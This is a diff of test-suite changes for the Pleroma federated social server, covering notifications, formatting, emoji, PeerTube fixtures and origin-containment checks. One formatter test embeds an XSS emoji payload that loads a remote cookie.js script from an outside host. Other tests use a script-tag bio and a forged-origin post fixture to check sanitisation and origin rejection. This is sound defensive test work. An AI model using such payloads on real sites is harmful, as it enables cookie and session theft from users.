diff options
Diffstat (limited to 'test')
| -rw-r--r-- | test/fixtures/httpoison_mock/7even.json | 1 | ||||
| -rw-r--r-- | test/fixtures/httpoison_mock/https__info.pleroma.site_activity.json | 14 | ||||
| -rw-r--r-- | test/fixtures/httpoison_mock/peertube.moe-vid.json | 1 | ||||
| -rw-r--r-- | test/formatter_test.exs | 56 | ||||
| -rw-r--r-- | test/notification_test.exs | 121 | ||||
| -rw-r--r-- | test/support/httpoison_mock.ex | 24 | ||||
| -rw-r--r-- | test/user_test.exs | 2 | ||||
| -rw-r--r-- | test/web/activity_pub/activity_pub_test.exs | 9 | ||||
| -rw-r--r-- | test/web/activity_pub/transmogrifier_test.exs | 33 | ||||
| -rw-r--r-- | test/web/common_api/common_api_test.exs | 11 | ||||
| -rw-r--r-- | test/web/common_api/common_api_utils_test.exs | 23 | ||||
| -rw-r--r-- | test/web/mastodon_api/account_view_test.exs | 3 | ||||
| -rw-r--r-- | test/web/mastodon_api/mastodon_api_controller_test.exs | 50 | ||||
| -rw-r--r-- | test/web/twitter_api/representers/activity_representer_test.exs | 2 | ||||
| -rw-r--r-- | test/web/twitter_api/representers/object_representer_test.exs | 6 | ||||
| -rw-r--r-- | test/web/twitter_api/twitter_api_controller_test.exs | 3 | ||||
| -rw-r--r-- | test/web/twitter_api/views/user_view_test.exs | 18 |
17 files changed, 358 insertions, 19 deletions
diff --git a/test/fixtures/httpoison_mock/7even.json b/test/fixtures/httpoison_mock/7even.json new file mode 100644 index 000000000..eb3bab14e --- /dev/null +++ b/test/fixtures/httpoison_mock/7even.json @@ -0,0 +1 @@ +{"type":"Person","id":"https://peertube.moe/accounts/7even","following":"https://peertube.moe/accounts/7even/following","followers":"https://peertube.moe/accounts/7even/followers","inbox":"https://peertube.moe/accounts/7even/inbox","outbox":"https://peertube.moe/accounts/7even/outbox","preferredUsername":"7even","url":"https://peertube.moe/accounts/7even","name":"7even","endpoints":{"sharedInbox":"https://peertube.moe/inbox"},"uuid":"fd6a914d-0383-4aca-b740-65ed96a0dd63","publicKey":{"id":"https://peertube.moe/accounts/7even#main-key","owner":"https://peertube.moe/accounts/7even","publicKeyPem":"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3vQ2uvYbDprVrq9Ti2wB\nn2J0WkewrzR/+NF4+KVl9s+FMyE4jlmnz+9WEnacKhV1x8a3SrsjLgND55WxNaPj\nabrh6lWmI0SNmHBLi1BejIVAR7CZElF3yCxG0xtNna0Hg6bhtL6I61QxnClhFunu\nDO4i6uyrUu2iXWGQDPzpWkGFrmZdyHOCNIr5PekphR/wcCluwbndO51Ku2RJAblW\nI+QlDG7ailpXyTZGUEO5yfJZX7dkCET1AsNxeBo41aPYzUN5rgRCDB/AdJXxrgZb\nsmtiObB9u+KYk9DuegPpHP3y+dapCSCvStBdPyTaPzsi1y/pOiTVfaxw0NYEJ/Cs\n0QIDAQAB\n-----END PUBLIC KEY-----"},"icon":{"type":"Image","mediaType":"image/png","url":"https://peertube.moe/static/avatars/0815978b-dd71-4797-ae3f-493a3445882a.png"},"@context":["https://www.w3.org/ns/activitystreams","https://w3id.org/security/v1",{"RsaSignature2017":"https://w3id.org/security#RsaSignature2017","Hashtag":"as:Hashtag","uuid":"http://schema.org/identifier","category":"http://schema.org/category","licence":"http://schema.org/license","sensitive":"as:sensitive","language":"http://schema.org/inLanguage","views":"http://schema.org/Number","size":"http://schema.org/Number","commentsEnabled":"http://schema.org/Boolean","support":"http://schema.org/Text"},{"likes":{"@id":"as:likes","@type":"@id"},"dislikes":{"@id":"as:dislikes","@type":"@id"},"shares":{"@id":"as:shares","@type":"@id"},"comments":{"@id":"as:comments","@type":"@id"}}],"summary":null}
\ No newline at end of file diff --git a/test/fixtures/httpoison_mock/https__info.pleroma.site_activity.json b/test/fixtures/httpoison_mock/https__info.pleroma.site_activity.json new file mode 100644 index 000000000..eab0341fe --- /dev/null +++ b/test/fixtures/httpoison_mock/https__info.pleroma.site_activity.json @@ -0,0 +1,14 @@ +{ + "@context": "https://www.w3.org/ns/activitystreams", + "actor": "https://mastodon.example.org/users/admin", + "attachment": [], + "attributedTo": "https://mastodon.example.org/users/admin", + "content": "<p>this post was not actually written by Haelwenn</p>", + "id": "https://info.pleroma.site/activity.json", + "published": "2018-09-01T22:15:00Z", + "tag": [], + "to": [ + "https://www.w3.org/ns/activitystreams#Public" + ], + "type": "Note" +} diff --git a/test/fixtures/httpoison_mock/peertube.moe-vid.json b/test/fixtures/httpoison_mock/peertube.moe-vid.json new file mode 100644 index 000000000..76296eb7d --- /dev/null +++ b/test/fixtures/httpoison_mock/peertube.moe-vid.json @@ -0,0 +1 @@ +{"type":"Video","id":"https://peertube.moe/videos/watch/df5f464b-be8d-46fb-ad81-2d4c2d1630e3","name":"Friday Night","duration":"PT29S","uuid":"df5f464b-be8d-46fb-ad81-2d4c2d1630e3","tag":[{"type":"Hashtag","name":"feels"}],"views":12,"sensitive":false,"commentsEnabled":true,"published":"2018-03-23T16:43:22.988Z","updated":"2018-03-24T16:28:46.002Z","mediaType":"text/markdown","content":"tfw\r\n\r\n\r\nsong is 'my old piano' by diana ross","support":null,"icon":{"type":"Image","url":"https://peertube.moe/static/thumbnails/df5f464b-be8d-46fb-ad81-2d4c2d1630e3.jpg","mediaType":"image/jpeg","width":200,"height":110},"url":[{"type":"Link","mimeType":"video/mp4","href":"https://peertube.moe/static/webseed/df5f464b-be8d-46fb-ad81-2d4c2d1630e3-480.mp4","width":480,"size":5015880},{"type":"Link","mimeType":"application/x-bittorrent","href":"https://peertube.moe/static/torrents/df5f464b-be8d-46fb-ad81-2d4c2d1630e3-480.torrent","width":480},{"type":"Link","mimeType":"application/x-bittorrent;x-scheme-handler/magnet","href":"magnet:?xs=https%3A%2F%2Fpeertube.moe%2Fstatic%2Ftorrents%2Fdf5f464b-be8d-46fb-ad81-2d4c2d1630e3-480.torrent&xt=urn:btih:11d3af6b5c812a376c2b29cdbd46e5fb42ee730e&dn=Friday+Night&tr=wss%3A%2F%2Fpeertube.moe%3A443%2Ftracker%2Fsocket&tr=https%3A%2F%2Fpeertube.moe%2Ftracker%2Fannounce&ws=https%3A%2F%2Fpeertube.moe%2Fstatic%2Fwebseed%2Fdf5f464b-be8d-46fb-ad81-2d4c2d1630e3-480.mp4","width":480},{"type":"Link","mimeType":"video/mp4","href":"https://peertube.moe/static/webseed/df5f464b-be8d-46fb-ad81-2d4c2d1630e3-360.mp4","width":360,"size":3620040},{"type":"Link","mimeType":"application/x-bittorrent","href":"https://peertube.moe/static/torrents/df5f464b-be8d-46fb-ad81-2d4c2d1630e3-360.torrent","width":360},{"type":"Link","mimeType":"application/x-bittorrent;x-scheme-handler/magnet","href":"magnet:?xs=https%3A%2F%2Fpeertube.moe%2Fstatic%2Ftorrents%2Fdf5f464b-be8d-46fb-ad81-2d4c2d1630e3-360.torrent&xt=urn:btih:1c3885b4d7cdb46193b62b9b76e72b1409cfb297&dn=Friday+Night&tr=wss%3A%2F%2Fpeertube.moe%3A443%2Ftracker%2Fsocket&tr=https%3A%2F%2Fpeertube.moe%2Ftracker%2Fannounce&ws=https%3A%2F%2Fpeertube.moe%2Fstatic%2Fwebseed%2Fdf5f464b-be8d-46fb-ad81-2d4c2d1630e3-360.mp4","width":360},{"type":"Link","mimeType":"video/mp4","href":"https://peertube.moe/static/webseed/df5f464b-be8d-46fb-ad81-2d4c2d1630e3-240.mp4","width":240,"size":2305488},{"type":"Link","mimeType":"application/x-bittorrent","href":"https://peertube.moe/static/torrents/df5f464b-be8d-46fb-ad81-2d4c2d1630e3-240.torrent","width":240},{"type":"Link","mimeType":"application/x-bittorrent;x-scheme-handler/magnet","href":"magnet:?xs=https%3A%2F%2Fpeertube.moe%2Fstatic%2Ftorrents%2Fdf5f464b-be8d-46fb-ad81-2d4c2d1630e3-240.torrent&xt=urn:btih:ac5773352d9e26f982d2da63acfb244f01ccafa4&dn=Friday+Night&tr=wss%3A%2F%2Fpeertube.moe%3A443%2Ftracker%2Fsocket&tr=https%3A%2F%2Fpeertube.moe%2Ftracker%2Fannounce&ws=https%3A%2F%2Fpeertube.moe%2Fstatic%2Fwebseed%2Fdf5f464b-be8d-46fb-ad81-2d4c2d1630e3-240.mp4","width":240},{"type":"Link","mimeType":"video/mp4","href":"https://peertube.moe/static/webseed/df5f464b-be8d-46fb-ad81-2d4c2d1630e3-720.mp4","width":720,"size":7928231},{"type":"Link","mimeType":"application/x-bittorrent","href":"https://peertube.moe/static/torrents/df5f464b-be8d-46fb-ad81-2d4c2d1630e3-720.torrent","width":720},{"type":"Link","mimeType":"application/x-bittorrent;x-scheme-handler/magnet","href":"magnet:?xs=https%3A%2F%2Fpeertube.moe%2Fstatic%2Ftorrents%2Fdf5f464b-be8d-46fb-ad81-2d4c2d1630e3-720.torrent&xt=urn:btih:b591068f4533c4e2865bb4cbb89887aecccdc523&dn=Friday+Night&tr=wss%3A%2F%2Fpeertube.moe%3A443%2Ftracker%2Fsocket&tr=https%3A%2F%2Fpeertube.moe%2Ftracker%2Fannounce&ws=https%3A%2F%2Fpeertube.moe%2Fstatic%2Fwebseed%2Fdf5f464b-be8d-46fb-ad81-2d4c2d1630e3-720.mp4","width":720},{"type":"Link","mimeType":"text/html","href":"https://peertube.moe/videos/watch/df5f464b-be8d-46fb-ad81-2d4c2d1630e3"}],"likes":{"id":"https://peertube.moe/videos/watch/df5f464b-be8d-46fb-ad81-2d4c2d1630e3/likes","type":"OrderedCollection","totalItems":0,"orderedItems":[]},"dislikes":{"id":"https://peertube.moe/videos/watch/df5f464b-be8d-46fb-ad81-2d4c2d1630e3/dislikes","type":"OrderedCollection","totalItems":0,"orderedItems":[]},"shares":{"id":"https://peertube.moe/videos/watch/df5f464b-be8d-46fb-ad81-2d4c2d1630e3/announces","type":"OrderedCollection","totalItems":2,"orderedItems":["https://peertube.moe/videos/watch/df5f464b-be8d-46fb-ad81-2d4c2d1630e3/announces/465","https://peertube.moe/videos/watch/df5f464b-be8d-46fb-ad81-2d4c2d1630e3/announces/1"]},"comments":{"id":"https://peertube.moe/videos/watch/df5f464b-be8d-46fb-ad81-2d4c2d1630e3/comments","type":"OrderedCollection","totalItems":0,"orderedItems":[]},"attributedTo":[{"type":"Group","id":"https://peertube.moe/video-channels/5224869f-aa63-4c83-ab3a-87c3a5ac440e"},{"type":"Person","id":"https://peertube.moe/accounts/7even"}],"to":["https://www.w3.org/ns/activitystreams#Public"],"cc":[],"@context":["https://www.w3.org/ns/activitystreams","https://w3id.org/security/v1",{"RsaSignature2017":"https://w3id.org/security#RsaSignature2017","Hashtag":"as:Hashtag","uuid":"http://schema.org/identifier","category":"http://schema.org/category","licence":"http://schema.org/license","sensitive":"as:sensitive","language":"http://schema.org/inLanguage","views":"http://schema.org/Number","size":"http://schema.org/Number","commentsEnabled":"http://schema.org/Boolean","support":"http://schema.org/Text"},{"likes":{"@id":"as:likes","@type":"@id"},"dislikes":{"@id":"as:dislikes","@type":"@id"},"shares":{"@id":"as:shares","@type":"@id"},"comments":{"@id":"as:comments","@type":"@id"}}]}
\ No newline at end of file diff --git a/test/formatter_test.exs b/test/formatter_test.exs index c2b3d4ac0..8453b72ac 100644 --- a/test/formatter_test.exs +++ b/test/formatter_test.exs @@ -20,10 +20,10 @@ defmodule Pleroma.FormatterTest do describe ".add_links" do test "turning urls into links" do - text = "Hey, check out https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla." + text = "Hey, check out https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla ." expected = - "Hey, check out <a href=\"https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla\">https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla</a>." + "Hey, check out <a href=\"https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla\">https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla</a> ." assert Formatter.add_links({[], text}) |> Formatter.finalize() == expected @@ -85,6 +85,12 @@ defmodule Pleroma.FormatterTest do "<a href=\"https://pleroma.com\">https://pleroma.com</a> <a href=\"https://pleroma.com/sucks\">https://pleroma.com/sucks</a>" assert Formatter.add_links({[], text}) |> Formatter.finalize() == expected + + text = "xmpp:contact@hacktivis.me" + + expected = "<a href=\"xmpp:contact@hacktivis.me\">xmpp:contact@hacktivis.me</a>" + + assert Formatter.add_links({[], text}) |> Formatter.finalize() == expected end end @@ -117,6 +123,35 @@ defmodule Pleroma.FormatterTest do assert expected_text == Formatter.finalize({subs, text}) end + + test "gives a replacement for single-character local nicknames" do + text = "@o hi" + o = insert(:user, %{nickname: "o"}) + + mentions = Formatter.parse_mentions(text) + + {subs, text} = Formatter.add_user_links({[], text}, mentions) + + assert length(subs) == 1 + Enum.each(subs, fn {uuid, _} -> assert String.contains?(text, uuid) end) + + expected_text = "<span><a class='mention' href='#{o.ap_id}'>@<span>o</span></a></span> hi" + assert expected_text == Formatter.finalize({subs, text}) + end + + test "does not give a replacement for single-character local nicknames who don't exist" do + text = "@a hi" + + mentions = Formatter.parse_mentions(text) + + {subs, text} = Formatter.add_user_links({[], text}, mentions) + + assert length(subs) == 0 + Enum.each(subs, fn {uuid, _} -> assert String.contains?(text, uuid) end) + + expected_text = "@a hi" + assert expected_text == Formatter.finalize({subs, text}) + end end describe ".parse_tags" do @@ -154,11 +189,26 @@ defmodule Pleroma.FormatterTest do text = "I love :moominmamma:" expected_result = - "I love <img height='32px' width='32px' alt='moominmamma' title='moominmamma' src='/finmoji/128px/moominmamma-128.png' />" + "I love <img height=\"32px\" width=\"32px\" alt=\"moominmamma\" title=\"moominmamma\" src=\"/finmoji/128px/moominmamma-128.png\" />" assert Formatter.emojify(text) == expected_result end + test "it does not add XSS emoji" do + text = + "I love :'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a):" + + custom_emoji = %{ + "'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)" => + "https://placehold.it/1x1" + } + + expected_result = + "I love <img height=\"32px\" width=\"32px\" alt=\"\" title=\"\" src=\"https://placehold.it/1x1\" />" + + assert Formatter.emojify(text, custom_emoji) == expected_result + end + test "it returns the emoji used in the text" do text = "I love :moominmamma:" diff --git a/test/notification_test.exs b/test/notification_test.exs index 2ca1ac13d..d86b5c1ab 100644 --- a/test/notification_test.exs +++ b/test/notification_test.exs @@ -1,6 +1,7 @@ defmodule Pleroma.NotificationTest do use Pleroma.DataCase alias Pleroma.Web.TwitterAPI.TwitterAPI + alias Pleroma.Web.CommonAPI alias Pleroma.{User, Notification} import Pleroma.Factory @@ -119,4 +120,124 @@ defmodule Pleroma.NotificationTest do assert Notification.for_user(third_user) != [] end end + + describe "notification lifecycle" do + test "liking an activity results in 1 notification, then 0 if the activity is deleted" do + user = insert(:user) + other_user = insert(:user) + + {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) + + assert length(Notification.for_user(user)) == 0 + + {:ok, _, _} = CommonAPI.favorite(activity.id, other_user) + + assert length(Notification.for_user(user)) == 1 + + {:ok, _} = CommonAPI.delete(activity.id, user) + + assert length(Notification.for_user(user)) == 0 + end + + test "liking an activity results in 1 notification, then 0 if the activity is unliked" do + user = insert(:user) + other_user = insert(:user) + + {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) + + assert length(Notification.for_user(user)) == 0 + + {:ok, _, _} = CommonAPI.favorite(activity.id, other_user) + + assert length(Notification.for_user(user)) == 1 + + {:ok, _, _, _} = CommonAPI.unfavorite(activity.id, other_user) + + assert length(Notification.for_user(user)) == 0 + end + + test "repeating an activity results in 1 notification, then 0 if the activity is deleted" do + user = insert(:user) + other_user = insert(:user) + + {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) + + assert length(Notification.for_user(user)) == 0 + + {:ok, _, _} = CommonAPI.repeat(activity.id, other_user) + + assert length(Notification.for_user(user)) == 1 + + {:ok, _} = CommonAPI.delete(activity.id, user) + + assert length(Notification.for_user(user)) == 0 + end + + test "repeating an activity results in 1 notification, then 0 if the activity is unrepeated" do + user = insert(:user) + other_user = insert(:user) + + {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) + + assert length(Notification.for_user(user)) == 0 + + {:ok, _, _} = CommonAPI.repeat(activity.id, other_user) + + assert length(Notification.for_user(user)) == 1 + + {:ok, _, _} = CommonAPI.unrepeat(activity.id, other_user) + + assert length(Notification.for_user(user)) == 0 + end + + test "liking an activity which is already deleted does not generate a notification" do + user = insert(:user) + other_user = insert(:user) + + {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) + + assert length(Notification.for_user(user)) == 0 + + {:ok, _deletion_activity} = CommonAPI.delete(activity.id, user) + + assert length(Notification.for_user(user)) == 0 + + {:error, _} = CommonAPI.favorite(activity.id, other_user) + + assert length(Notification.for_user(user)) == 0 + end + + test "repeating an activity which is already deleted does not generate a notification" do + user = insert(:user) + other_user = insert(:user) + + {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) + + assert length(Notification.for_user(user)) == 0 + + {:ok, _deletion_activity} = CommonAPI.delete(activity.id, user) + + assert length(Notification.for_user(user)) == 0 + + {:error, _} = CommonAPI.repeat(activity.id, other_user) + + assert length(Notification.for_user(user)) == 0 + end + + test "replying to a deleted post without tagging does not generate a notification" do + user = insert(:user) + other_user = insert(:user) + + {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) + {:ok, _deletion_activity} = CommonAPI.delete(activity.id, user) + + {:ok, _reply_activity} = + CommonAPI.post(other_user, %{ + "status" => "test reply", + "in_reply_to_status_id" => activity.id + }) + + assert length(Notification.for_user(user)) == 0 + end + end end diff --git a/test/support/httpoison_mock.ex b/test/support/httpoison_mock.ex index 527c2e1f7..7057f30fb 100644 --- a/test/support/httpoison_mock.ex +++ b/test/support/httpoison_mock.ex @@ -3,6 +3,14 @@ defmodule HTTPoisonMock do def get(url, body \\ [], headers \\ []) + def get("https://info.pleroma.site/activity.json", _, _) do + {:ok, + %Response{ + status_code: 200, + body: File.read!("test/fixtures/httpoison_mock/https__info.pleroma.site_activity.json") + }} + end + def get("https://puckipedia.com/", [Accept: "application/activity+json"], _) do {:ok, %Response{ @@ -760,6 +768,22 @@ defmodule HTTPoisonMock do }} end + def get("https://peertube.moe/videos/watch/df5f464b-be8d-46fb-ad81-2d4c2d1630e3", _, _) do + {:ok, + %Response{ + status_code: 200, + body: File.read!("test/fixtures/httpoison_mock/peertube.moe-vid.json") + }} + end + + def get("https://peertube.moe/accounts/7even", _, _) do + {:ok, + %Response{ + status_code: 200, + body: File.read!("test/fixtures/httpoison_mock/7even.json") + }} + end + def get(url, body, headers) do {:error, "Not implemented the mock response for get #{inspect(url)}, #{inspect(body)}, #{ diff --git a/test/user_test.exs b/test/user_test.exs index 352a16687..5c61b0930 100644 --- a/test/user_test.exs +++ b/test/user_test.exs @@ -220,7 +220,7 @@ defmodule Pleroma.UserTest do end test "it has required fields" do - [:name, :nickname, :ap_id] + [:name, :ap_id] |> Enum.each(fn field -> cs = User.remote_user_creation(Map.delete(@valid_remote, field)) refute cs.valid? diff --git a/test/web/activity_pub/activity_pub_test.exs b/test/web/activity_pub/activity_pub_test.exs index 90c0bd768..1cf7d6bbc 100644 --- a/test/web/activity_pub/activity_pub_test.exs +++ b/test/web/activity_pub/activity_pub_test.exs @@ -506,6 +506,15 @@ defmodule Pleroma.Web.ActivityPub.ActivityPubTest do end end + test "it can fetch peertube videos" do + {:ok, object} = + ActivityPub.fetch_object_from_id( + "https://peertube.moe/videos/watch/df5f464b-be8d-46fb-ad81-2d4c2d1630e3" + ) + + assert object + end + def data_uri do File.read!("test/fixtures/avatar_data_uri") end diff --git a/test/web/activity_pub/transmogrifier_test.exs b/test/web/activity_pub/transmogrifier_test.exs index e455da39f..afa25bb60 100644 --- a/test/web/activity_pub/transmogrifier_test.exs +++ b/test/web/activity_pub/transmogrifier_test.exs @@ -615,6 +615,18 @@ defmodule Pleroma.Web.ActivityPub.TransmogrifierTest do assert User.following?(follower, followed) == false end + + test "it rejects activities without a valid ID" do + user = insert(:user) + + data = + File.read!("test/fixtures/mastodon-follow-activity.json") + |> Poison.decode!() + |> Map.put("object", user.ap_id) + |> Map.put("id", "") + + :error = Transmogrifier.handle_incoming(data) + end end describe "prepare outgoing" do @@ -786,4 +798,25 @@ defmodule Pleroma.Web.ActivityPub.TransmogrifierTest do assert rewritten["url"] == "http://example.com" end end + + describe "actor origin containment" do + test "it rejects objects with a bogus origin" do + {:error, _} = ActivityPub.fetch_object_from_id("https://info.pleroma.site/activity.json") + end + + test "it rejects activities which reference objects with bogus origins" do + user = insert(:user, %{local: false}) + + data = %{ + "@context" => "https://www.w3.org/ns/activitystreams", + "id" => user.ap_id <> "/activities/1234", + "actor" => user.ap_id, + "to" => ["https://www.w3.org/ns/activitystreams#Public"], + "object" => "https://info.pleroma.site/activity.json", + "type" => "Announce" + } + + :error = Transmogrifier.handle_incoming(data) + end + end end diff --git a/test/web/common_api/common_api_test.exs b/test/web/common_api/common_api_test.exs index a5da271b3..2a2c40833 100644 --- a/test/web/common_api/common_api_test.exs +++ b/test/web/common_api/common_api_test.exs @@ -1,6 +1,7 @@ defmodule Pleroma.Web.CommonAPI.Test do use Pleroma.DataCase alias Pleroma.Web.CommonAPI + alias Pleroma.User import Pleroma.Factory @@ -10,4 +11,14 @@ defmodule Pleroma.Web.CommonAPI.Test do assert activity.data["object"]["tag"] == ["2hu"] end + + test "it adds emoji when updating profiles" do + user = insert(:user, %{name: ":karjalanpiirakka:"}) + + CommonAPI.update(user) + user = User.get_cached_by_ap_id(user.ap_id) + [karjalanpiirakka] = user.info["source_data"]["tag"] + + assert karjalanpiirakka["name"] == ":karjalanpiirakka:" + end end diff --git a/test/web/common_api/common_api_utils_test.exs b/test/web/common_api/common_api_utils_test.exs index f39472ee3..b01ce04f8 100644 --- a/test/web/common_api/common_api_utils_test.exs +++ b/test/web/common_api/common_api_utils_test.exs @@ -1,5 +1,6 @@ defmodule Pleroma.Web.CommonAPI.UtilsTest do alias Pleroma.Web.CommonAPI.Utils + alias Pleroma.Web.Endpoint alias Pleroma.Builders.{UserBuilder} use Pleroma.DataCase @@ -29,4 +30,26 @@ defmodule Pleroma.Web.CommonAPI.UtilsTest do assert Utils.confirm_current_password(user, "test") == {:ok, user} end end + + test "parses emoji from name and bio" do + {:ok, user} = UserBuilder.insert(%{name: ":karjalanpiirakka:", bio: ":perkele:"}) + + expected = [ + %{ + "type" => "Emoji", + "icon" => %{"type" => "Image", "url" => "#{Endpoint.url()}/finmoji/128px/perkele-128.png"}, + "name" => ":perkele:" + }, + %{ + "type" => "Emoji", + "icon" => %{ + "type" => "Image", + "url" => "#{Endpoint.url()}/finmoji/128px/karjalanpiirakka-128.png" + }, + "name" => ":karjalanpiirakka:" + } + ] + + assert expected == Utils.emoji_from_profile(user) + end end diff --git a/test/web/mastodon_api/account_view_test.exs b/test/web/mastodon_api/account_view_test.exs index 8bf194e6b..35c8a1fb0 100644 --- a/test/web/mastodon_api/account_view_test.exs +++ b/test/web/mastodon_api/account_view_test.exs @@ -20,6 +20,7 @@ defmodule Pleroma.Web.MastodonAPI.AccountViewTest do info: %{"note_count" => 5, "follower_count" => 3, "source_data" => source_data}, nickname: "shp@shitposter.club", name: ":karjalanpiirakka: shp", + bio: "<script src=\"invalid-html\"></script><span>valid html</span>", inserted_at: ~N[2017-08-15 15:47:06.597036] }) @@ -33,7 +34,7 @@ defmodule Pleroma.Web.MastodonAPI.AccountViewTest do followers_count: 3, following_count: 0, statuses_count: 5, - note: user.bio, + note: "<span>valid html</span>", url: user.ap_id, avatar: "http://localhost:4001/images/avi.png", avatar_static: "http://localhost:4001/images/avi.png", diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs index 9e33c1d04..60dafcf03 100644 --- a/test/web/mastodon_api/mastodon_api_controller_test.exs +++ b/test/web/mastodon_api/mastodon_api_controller_test.exs @@ -206,7 +206,19 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do |> assign(:user, user) |> get("/api/v1/accounts/verify_credentials") - assert %{"id" => id} = json_response(conn, 200) + assert %{"id" => id, "source" => %{"privacy" => "public"}} = json_response(conn, 200) + assert id == to_string(user.id) + end + + test "verify_credentials default scope unlisted", %{conn: conn} do + user = insert(:user, %{info: %{"default_scope" => "unlisted"}}) + + conn = + conn + |> assign(:user, user) + |> get("/api/v1/accounts/verify_credentials") + + assert %{"id" => id, "source" => %{"privacy" => "unlisted"}} = json_response(conn, 200) assert id == to_string(user.id) end @@ -368,6 +380,30 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do assert id == to_string(activity_two.id) end + + test "list timeline does not leak non-public statuses for unfollowed users", %{conn: conn} do + user = insert(:user) + other_user = insert(:user) + {:ok, activity_one} = TwitterAPI.create_status(other_user, %{"status" => "Marisa is cute."}) + + {:ok, activity_two} = + TwitterAPI.create_status(other_user, %{ + "status" => "Marisa is cute.", + "visibility" => "private" + }) + + {:ok, list} = Pleroma.List.create("name", user) + {:ok, list} = Pleroma.List.follow(list, other_user) + + conn = + conn + |> assign(:user, user) + |> get("/api/v1/timelines/list/#{list.id}") + + assert [%{"id" => id}] = json_response(conn, 200) + + assert id == to_string(activity_one.id) + end end describe "notifications" do @@ -691,6 +727,18 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do assert User.following?(other_user, user) == true end + test "verify_credentials", %{conn: conn} do + user = insert(:user, %{info: %{"default_scope" => "private"}}) + + conn = + conn + |> assign(:user, user) + |> get("/api/v1/accounts/verify_credentials") + + assert %{"id" => id, "source" => %{"privacy" => "private"}} = json_response(conn, 200) + assert id == to_string(user.id) + end + test "/api/v1/follow_requests/:id/reject works" do user = insert(:user, %{info: %{"locked" => true}}) other_user = insert(:user) diff --git a/test/web/twitter_api/representers/activity_representer_test.exs b/test/web/twitter_api/representers/activity_representer_test.exs index 3f85e028b..894d20049 100644 --- a/test/web/twitter_api/representers/activity_representer_test.exs +++ b/test/web/twitter_api/representers/activity_representer_test.exs @@ -126,7 +126,7 @@ defmodule Pleroma.Web.TwitterAPI.Representers.ActivityRepresenterTest do } expected_html = - "<p>2hu</p>alert('YAY')Some <img height='32px' width='32px' alt='2hu' title='2hu' src='corndog.png' /> content mentioning <a href=\"#{ + "<p>2hu</p>alert('YAY')Some <img height=\"32px\" width=\"32px\" alt=\"2hu\" title=\"2hu\" src=\"corndog.png\" /> content mentioning <a href=\"#{ mentioned_user.ap_id }\">@shp</a>" diff --git a/test/web/twitter_api/representers/object_representer_test.exs b/test/web/twitter_api/representers/object_representer_test.exs index ebac051dc..228b2ac42 100644 --- a/test/web/twitter_api/representers/object_representer_test.exs +++ b/test/web/twitter_api/representers/object_representer_test.exs @@ -23,7 +23,8 @@ defmodule Pleroma.Web.TwitterAPI.Representers.ObjectReprenterTest do id: 6, url: "someurl", mimetype: "sometype", - oembed: false + oembed: false, + description: nil } assert expected_object == ObjectRepresenter.to_map(object) @@ -46,7 +47,8 @@ defmodule Pleroma.Web.TwitterAPI.Representers.ObjectReprenterTest do "http://mastodon.example.org/system/media_attachments/files/000/000/001/original/8619f31c6edec470.png", mimetype: "image/png", oembed: false, - id: nil + id: nil, + description: "blabla" } assert expected_object == ObjectRepresenter.to_map(object) diff --git a/test/web/twitter_api/twitter_api_controller_test.exs b/test/web/twitter_api/twitter_api_controller_test.exs index 3a035e298..87bcdaf71 100644 --- a/test/web/twitter_api/twitter_api_controller_test.exs +++ b/test/web/twitter_api/twitter_api_controller_test.exs @@ -77,7 +77,8 @@ defmodule Pleroma.Web.TwitterAPI.ControllerTest do conn = conn_with_creds |> post(request_path, %{status: " "}) assert json_response(conn, 400) == error_response - conn = conn_with_creds |> post(request_path, %{status: "Nice meme."}) + # we post with visibility private in order to avoid triggering relay + conn = conn_with_creds |> post(request_path, %{status: "Nice meme.", visibility: "private"}) assert json_response(conn, 200) == ActivityRepresenter.to_map(Repo.one(Activity), %{user: user}) diff --git a/test/web/twitter_api/views/user_view_test.exs b/test/web/twitter_api/views/user_view_test.exs index fefb6bdcc..7075a2370 100644 --- a/test/web/twitter_api/views/user_view_test.exs +++ b/test/web/twitter_api/views/user_view_test.exs @@ -22,7 +22,7 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do test "A user with emoji in username", %{user: user} do expected = - "<img height='32px' width='32px' alt='karjalanpiirakka' title='karjalanpiirakka' src='/file.png' /> man" + "<img height=\"32px\" width=\"32px\" alt=\"karjalanpiirakka\" title=\"karjalanpiirakka\" src=\"/file.png\" /> man" user = %{ user @@ -65,8 +65,8 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do "name" => user.name, "screen_name" => user.nickname, "name_html" => user.name, - "description" => HtmlSanitizeEx.strip_tags(user.bio), - "description_html" => HtmlSanitizeEx.strip_tags(user.bio), + "description" => HtmlSanitizeEx.strip_tags(user.bio |> String.replace("<br>", "\n")), + "description_html" => HtmlSanitizeEx.basic_html(user.bio), "created_at" => user.inserted_at |> Utils.format_naive_asctime(), "favourites_count" => 0, "statuses_count" => 1, @@ -104,8 +104,8 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do "name" => user.name, "screen_name" => user.nickname, "name_html" => user.name, - "description" => HtmlSanitizeEx.strip_tags(user.bio), - "description_html" => HtmlSanitizeEx.strip_tags(user.bio), + "description" => 